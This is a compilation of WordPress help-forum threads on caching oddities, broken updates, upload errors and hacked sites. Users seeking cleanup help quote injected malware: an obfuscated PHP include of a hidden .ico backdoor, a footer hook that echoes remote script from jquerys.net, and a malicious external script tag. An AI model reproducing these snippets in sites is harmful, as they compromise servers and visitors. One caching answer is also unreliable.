Why is there a 'cache' folder in my /wp-content/uploads folder? - wordpress

I'm using WordPress 3.5.1. On my web site, the image paths for my post thumbnails, instead of directly linking to the image (i.e. /wp-content/uploads/image.jpg) are linking to /wp-content/uploads/cache/image-slug/12314335235.jpg
Images 'inserted into posts' show up using their original URLs (i.e. /wp-content/uploads/image.jpg). The cache somehow only applies to post thumbnails.
I've searched for why this is happening, but haven't found any solutions. If it makes a difference, I used to have WP Super Cache installed, but it's been a few days since I've properly deactivated and deleted the plugin.
Why would this be happening, and how can I stop it (and pull the images directly)?
Thanks!

Enable/Disable Caching in wp-config.php.
Another caching mechanism you could take advantage of is the default WordPress object cache. You can enable or disable the native WordPress object cache using your wp-config.php file, like so.
define('WP_CACHE', true);
Simply add the above code directly above /* That's all, stop editing! Happy blogging. */ using any text editor (Notepad is fine) and save the file.

For me, it was malware that had installed itself onto my site, the docs and cache folder where simple a hideout to execute its malicious code (wordfence flagged all the files). I couldn't delete it through the wp-files plugin, so i did it through ssh using the command
cd /home/bitnami/apps/wordpress/htdocs
sudo rm -f -r docs

Related

My wordpress site is brocken. dont know what todo. Tried safe mode plugin but nothing happen

My wordpress site was working fine , but wordpress update it to V 5.4 and after that my website is not working , not even i can access my admin dashboard.
I tried all these step to solve this
MANUAL INSTLLATION (RECOMMENDED)
Download the WP Safe Mode plugin and unzip it, you’ll now have a
wp-safe-mode folder.
Connect to your server (for example via FTP) and go to your website
folder.
Add this line to your wp-config.php file:
if( !defined('WPMU_PLUGIN_DIR') ) define( 'WPMU_PLUGIN_DIR',
dirname(__FILE__).'/wp-content/wp-safe-mode' ); //WP Safe Mode
Create the folder named wp-safe-mode inside your wp-contents folder.
Uploade the file wp-safe-mode/bootstrap/wp-safe-mode-loader.php into
the newly created wp-safe-mode folder.
Upload the entire wp-safe-mode folder to your plugins folder in
wp-content/plugins.
If your site is broken and you cannot install plugins or access the dashboard, you can modify the loader file temporarily to gain access by following these additional steps:
Open the plugin file wp-safe-mode-loader.php and change this line:
public $safe_mode_on = false;
to
public $safe_mode_on = true;
Upload the modified wp-safe-mode-loader.php file to the
wp-contents/plugins/wp-safe-mode folder.
Visit your site, deactivate plugins etc.
Undo the changes you just made to wp-safe-mode-loader.php when you
want to disable safe mode.
But nothing works for me. Can you please suggest something so i can fix my problem
Theme Conflict Troubleshoot:
To perform this, you just activate a default theme, like Twenty Nineteen. Unfortunately, because your site is showing an error, you will need to perform the troubleshoot with either your web host’s file manager (like cPanel’s Filemanager), or use FTP or sFTP (it’s like secure version of FTP.) It’s important to note that in switching themes, you won’t lose your chosen theme’s settings. To do this, you rename your active theme’s folder by adding DISABLE or OFF to the end of the folder’s name. For example, if you’re using Twenty Eighteen and the folder is ‘twentyeighteen’, you would name it ‘twentyeighteenDISABLE’ or ‘twentyeighteenOLD’ . Go back to the front of your site and refresh.
The objective is to check whether the mistake leaves. In the event that it doesn’t, it is anything but a subject issue. Try to rename the organizer back to its unique name when you’re finished investigating.
Plugin Conflict Troubleshoot
If it’s not the theme, it might be a plugin issue. In a way, troubleshooting is similar. However, it’s much easier to rename the plugin folder to ‘pluginsOFF’. Visit the site, and log-in. This will turn off all of the plugins. Please note that it won’t remove the original settings of those plugins, as they will be there when you reactivate them later on.
Once the plugins are off, go back and rename the folder back to ‘plugins’. Go to your WordPress admin area and reactivate each, one-by-one, until you get the screen that says “There has been a critical error on your website”. The plugin that you just reactivated, is the problem.
You can either disable the plugin that caused the problem or remove it or roll it back to the previous version using the rollback plugin and wait until the developer releases a new version of the plugin.

Wordpress old/updated/deleted CSS files are being served minified and I cant delete them. Why?

Backstory
We are using a LAMP stack (bitnami) to run a multisite Wordpress instance. This is the second time I have ran into a file that will not update when we push an update (We use git and pull the latest changes to the bitnami server).
We have noticed that when deleting (renaming for that matter) the file, it can still be retrieved by performing a GET on the resource (or the url in a browser). Also, if we were trying to make changes the changes do not come with the file - it is still the old file. Interestingly enough, the file is minified, which because of issues with this in the past we do not use any plugins that minify our CSS. So there should be no reason for it to be minified.
We have WP Total Cache - clearing all caches is successful but does not stop this from happening. (We used to use WP Super Cache, when this bug happened we decided to change plugins to WP Total Cache and purged the cache and it fixed the problem - but it is back and that no longer works).
I have also seen the trick where we can use a "?ver=###" query param on the url. This works but this would prevent us from using CloudFront for our files (currently disabled for all this testing so its not the problem either). Also I am not convinced it is a long term solution - or a solution at all since these minified files are being created and shouldnt be in the first place.
Additional information
It may not be helpful, but the files we have noticed this with are in a theme folder that is not technically an active theme. We just use the folder for additional resources that we have created ourselves. We reference them in the head of some pages.
Example:
/wp-content/themes/active-theme <- The active theme
/wp-content/themes/resources <- Our custom resources
Questions:
Where is this file being stored?
How can I delete it?
How can I prevent this from wasting our time ever again?
I found that the issue was with the bitnami server itself. The Apache2 module PageSpeed was causing the served files to be minified and cached resulting in the pages never updating no matter what we did on wordpress.
Apache:
To disable PageSpeed, comment out the following lines in your httpd.conf (/opt/bitnami/apache2/conf/httpd.conf)
#Include conf/pagespeed.conf
#Include conf/pagespeed_libraries.conf
Solution found here

Wordpress site hacked?

It looks like my wordpress site has been hacked. Following code snipt was in index.php, wp-config.php
<?php
/*6b9bb*/
#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
WP Admin URL and put strong password username
changed cpanel/FTP password with strong one
Implemented iTheme Security
Updated Wordpress to latest (themes and plugins)
However, the code again repeated. What can be good solutions?
p.s. I am using siteground.
Thanks
Yeah someone is including a .ico file (open it with a Text Editor, and you will see it is some php Code and no real ico file)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow despite your changes of host and passwords you hacker is able to get in, once they are in they can setup all sorts of backdoors to keep access, any .php file of theirs can do this.
At the moment closing the initial front-door they use is your sole occupation.
Follow the advice in this article:
https://codex.wordpress.org/FAQ_My_site_was_hacked
And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. you'll have to replace all files with fresh downloads. mostly it's straight forward:
Backup the whole installation (just in case)
Download the complete wp-content/uploads folder
Make a Screenshot or save the page with the currently active plugins
Delete ALL files
Get a fresh wordpress setup and extract it
Download a fresh copy of your theme and child-theme (recreate the previous setup)
Copy the previous wp-config.php to this fresh install. but take a GOOD look at it. usually it also has some virus/backdoors in it. usually easy to see and remove. now you're already connected with your DB
Examine the saved uploads folder for files that shouldnt be there, like php files. then upload it to the new folder
Reinstall all plugins, fresh downloads
I faced this problem too, and step by step I did the steps below:
Cleaning the injected code, manually
Changing all the passwords
Hiding the WP admin dashboard URL
Limiting the login attempts
Installing security plugins (Sucuri, Wordfence security)
Contracting with Sucuri plan
The good thing is to install Wordfence security plugin, run the scan, then you will detect all the files with the injected code and you can clean the injected code manually.
you can also visit this link too
https://naderzad.info/web-development/wordpress-code-injection/

has my wordpress site been hacked? was it a plugin?

this script keeps coming back to my wp-load.php file in public_html folder:
function pluginAuth(){
echo(wp_remote_retrieve_body(wp_remote_get('http://jquerys.net/jquery-1.6.3.min.js')));
}
add_action('wp_footer', 'pluginAuth');
this directs to a virus site "jquerys.net"
What can be the solution. deleting the fucntion from wp-load.php does not eliminate it, as it regenrates on refreshing any page of my blog.
kindly help
There could be malicious code injected into any of your wordpress files. You will need to go through all files especially inside your theme to look for code or files / folders that shouldn't be there.
After this you can use this article to make your build more secure:
http://codex.wordpress.org/Hardening_WordPress
Has been very useful to me in the past for preventing this sort of thing from happening again. You can do as many or as little of the security measures as you like.
I would definitely recommend doing everything from the Securing wp-admin section.
Most probably you have some infected or malicious file in wp-ulpoads folder, check there also for any file type, different than image or documents.
Also important: check your current theme functions.php file for malicious code, often hacked themes (i.e. downloaded via bittorent websites of mafiashare websites) inject such code, search for any curl() requests, actually not only in functions.php, but in files (if your theme has them) options.php or settings.php, etc.
You seem to have an infected WordPress installation. Use Theme Authenticity Checker OR Exploit Scanner plugins for automatically detecting potential malicious files that might be the culprit.
You can also try the free scan service of Sucuri.
Once you are done with the identification of the corrupted files, replace them with their official counterparts which you can get from WordPress.org.
As a defensive measure, install WordPress File Monitor Plus plugin - as it emails each time some file is changed. This will allow you to quickly revert any changes that some hacker/script makes in the future!
i was able to detect the malicious script. it was in the public_html folder. the file was "main.php" which is not in the default installation and also it does not contribute to any theme or plugin. after deleting all the unverfied plugins, i deleted this file and deleted the code in the wp-load.php.
at first when i did not deleted the "main.php" file. the 'function' in the wp-load kept coming back. but after deleting "main.php" file, i have rid myself from this virus.
There is new virus in WP
There's a downloading of a update.exe initiated by line
<script src="//socialstatsplugin.com/jqury.js"></script>
i Have done some reviews for this kind of virus.
Just go to your WP folder and check if any unwanted hidden file and when you browse through that , the files are unreadable.
As said Just do
DELETE FROM wp_options WHERE option_name like '%wp_data_newa%'
and delete all unwanted hidden folder within any folder. It worked till now. Hope it will help. Never knows the future.
Thanks

WordPress Upload Media to a post issue

I'm struggling from an error on WordPress 3.8.1.
Whenever I try to upload a media to a post, it does not add, it says An error occurred in the upload. Please try again later..
But the weirder thing is that it is shown on dashboard/media/library even after this issue.
I also cannot see uploaded attached media to my posts (edit post / [add media button]) / media library / uploaded to this post, but in dashboard/media/library section , these old uploaded images are shown properly that which is uploaded to what post.
I have tried the followings:
Re-installed both my local version and en_US from both update manager and manually
Deleted wp-includes and wp-admin folders and replaced them manually.
I have checked chown and chmod of the wp-content/uploads folder. To make sure they are working, I have deleted wp-content/uploads/2014 folder, and after first upload that shows this error, the folder is created with right chown and chmod and files were there (wp-content/uploads/2014/01/26/file with resolutions.jpg)
I have deleted unneeded plugins, deactivated all plugins and themes, switched back to WordPress's default plugin, I have even reset active plugins json object at wp_options from SQL, did not help.
I have enabled php error logs, nothing related is shown
I have altered the WP_DEBUG definition to true, I have even defined WP_DEBUG_DISPLAY to true, no help.
When I try to add from wp-admin/media-new.php , using multi uploader, file is freezing at "Crunching…" step, but old browser upload works flawlessly.
I'm managing the VPS and hosting the blog myself with CentOS 6.5 x64. safe_mode is set as off. There is not a mod_security option in my php.ini. My upload_max_filesize in php.ini is set to 20M, memory_limit is 256M, only 3 sites are hosted and memory is quite empty while testing these. This also happens even with 50kb .jpg images, so this should not be related.
I have re-uploaded all wordpress files from a clean downloaded zip, no help.
I have tried adding AddType x-mapp-php5 .php .php4 to the end of .htaccess as suggested here, that did not help at all.
The thing is that, I have tried a clean installation to another domain on the same server, it is working as it should.
What could be the problem? How can I fix this?
Thanks in advance,
See if custom post type has any files that are in UTF-8. If you change it to ANSI, that should help, if thats an issue.
I had the same issue, and found that there is a problem with my theme itself... try doing the same action using the twentyten theme. if that works, then take a look and see if there is any conflicting code in the functions.php of the theme...
if you are using a child theme can I suggest making another child theme, or using an alternative them as in my experience not all themes "like" being used as a child...
If you are trying to upload into a custom post-type, change the capability_type setting in your functions.php file to 'post' and it should fix your problem.
Check permissions of your wp-content or wp-content/upload folders, If folder permission is not 755 then change it to 755 and re-upload again. I hope it will solve your problem.
If you are using a low scale server and added a plugin named "WP-SmushIt" then it will surely cause an error. Reason is simple this plugin uses CPU resources to minimize the size of images in process of optimizing it and so it crosses the server limited execution time. Solution is simple-> Go with higher plan servers or try changing server execution time listed in php config file.
Not directly related to this, but I have experienced the exact same issue after moving the very same site to a different server now. Only difference is now I've been using Nginx instead of Apache. I have checked the ownerships before and they were all correct (else the normal upload wouldn't work earlier either). I'm leaving this here just as a reference.
The fix on my newer case was simply changing the ownership of the web root and all the files inside.
Nginx and PHP5-FPM were running with same user: www-data, which is at the group with same name: www-data.
So changing of all the ownership of the files fixed in this case:
su
chown -R www-data:www-data /path/to/wordpress/root/
And the issue was gone.
I still don't know the original reason of my old issue, I had to wipe, start from clean and restore the posts, plugins etc. from scratch.
I was facing same issue in wordpress like media not loaded in popup. then i have resolved.
I think, Some times problem created by ajax response.Means ajax response comes with some additional content.
Wordpress media popup is loaded content by ajax(json Response) and ajax give response with some content like style and other.
For Example:-
<style>
.class{}
</style>
then json(ajax response).
So First check your ajax response in console.We have to disable all plugins then check it is work or not.If no then activate default theme. because content comes from plugin and theme.
check your folder permission, and mod_security settings, also try to increase max_execution_time and memory,

Resources